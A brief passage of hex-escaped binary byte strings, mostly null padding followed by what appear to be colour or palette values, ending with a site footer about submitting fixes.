"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x9e\x69\x03\x02\xa3\x6e\x09\x23\xa3\x6e\x08\x99\xa3\x6f\x09\xf1\xba\x92\x47".
"\xfc\xda\xc5\x9f\xfc\xf2\xeb\xde\xfd\xed\xe3\xd2\xfe\xdb\xc5\x9d\xfe\xcb\xad\x73".
"\xfe\xbc\x96\x4c\xfe\xb0\x82\x2c\xfe\xab\x7a\x1e\xfe\xab\x7a\x1e\xfe\xb0\x82\x2c".

Fixes

No fixes

In order to submit a new fix you need to be registered.